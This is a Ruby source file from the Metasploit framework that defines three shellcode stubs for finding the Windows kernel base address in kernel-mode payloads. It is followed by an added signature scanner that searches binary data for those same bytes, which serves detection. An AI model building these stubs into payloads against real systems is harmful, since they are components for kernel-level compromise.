GitHub Repository: rapid7/metasploit-framework
Path: blob/master/lib/rex/payloads/win32/kernel/common.rb
# -*- coding: binary -*-
module Rex
module Payloads
module Win32
module Kernel

#
# This module provides common methods that may be shared across more than
# one kernel-mode payload. Many of these are from the following paper:
#
# http://www.uninformed.org/?v=3&a=4&t=sumry
#
module Common

  #
  # Returns a stub that will find the base address of ntoskrnl and
  # place it in eax. This method works by using an IDT entry. Credit
  # to eEye.
  #
  def self.find_nt_idt_eeye
    "\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7"
  end

  #
  # Returns a stub that will find the base address of ntoskrnl and
  # place it in eax. This method uses a pointer found in KdVersionBlock.
  #
  def self.find_nt_kdversionblock
    "\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10"
  end

  #
  # Returns a stub that will find the base address of ntoskrnl and
  # place it in eax. This method uses a pointer found in the
  # processor control region as a starting point.
  #
  def self.find_nt_pcr
    "\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4"
  end

  #
  # Alias for resolving symbols.
  #
  def self.resolve_call_sym
    Rex::Payloads::Win32::Common.resolve_call_sym
  end

end

end
end
end
end
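Because the three ntoskrnl-locating stubs above are fixed byte sequences, they make straightforward detection signatures. The following scanner is an added example and is not part of metasploit-framework or the Rex library: it copies the three stub byte strings verbatim from the module, searches an arbitrary binary buffer for them, and reports every hit with its offset. The module name `KernelStubScanner`, the `scan` method and the sample buffer are assumptions constructed for this example.

```ruby
# frozen_string_literal: true

# Added detection example (not metasploit-framework code): a minimal
# signature scanner for the ntoskrnl-locating stubs defined in
# Rex::Payloads::Win32::Kernel::Common. Useful for flagging those
# stubs inside a captured payload blob or a memory dump.
module KernelStubScanner
  # Byte sequences copied verbatim from the module above. `.b` forces
  # ASCII-8BIT so the comparison is byte-wise regardless of the
  # encoding of the string being scanned.
  SIGNATURES = {
    "find_nt_idt_eeye"       => "\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7".b,
    "find_nt_kdversionblock" => "\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10".b,
    "find_nt_pcr"            => "\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4".b,
  }.freeze

  # Scans +buffer+ (any String) for every signature and returns an array
  # of { name:, offset:, length: } hashes sorted by offset. Repeated
  # occurrences of the same stub are all reported.
  def self.scan(buffer)
    buf = buffer.b
    hits = []
    SIGNATURES.each do |name, sig|
      pos = 0
      # String#index with a start offset lets us walk every occurrence.
      while (idx = buf.index(sig, pos))
        hits << { name: name, offset: idx, length: sig.bytesize }
        pos = idx + 1
      end
    end
    hits.sort_by { |h| h[:offset] }
  end

  # Constructed sample buffer (not real captured data): a 16-byte NOP
  # sled, the eEye IDT stub, five INT3 bytes, then the PCR stub.
  SAMPLE = ("\x90".b * 16) +
           SIGNATURES["find_nt_idt_eeye"] +
           ("\xcc".b * 5) +
           SIGNATURES["find_nt_pcr"]

  # Convenience wrapper so the sample result can be inspected directly.
  def self.scan_sample
    scan(SAMPLE)
  end
end

if __FILE__ == $PROGRAM_NAME
  KernelStubScanner.scan_sample.each do |h|
    puts format("%-24s at offset %d (%d bytes)", h[:name], h[:offset], h[:length])
  end
end
```

The scanner is intentionally exact-match only; a stub that has been re-encoded or had its immediates changed will not be found, so in practice these byte strings belong in a broader signature set rather than standing alone.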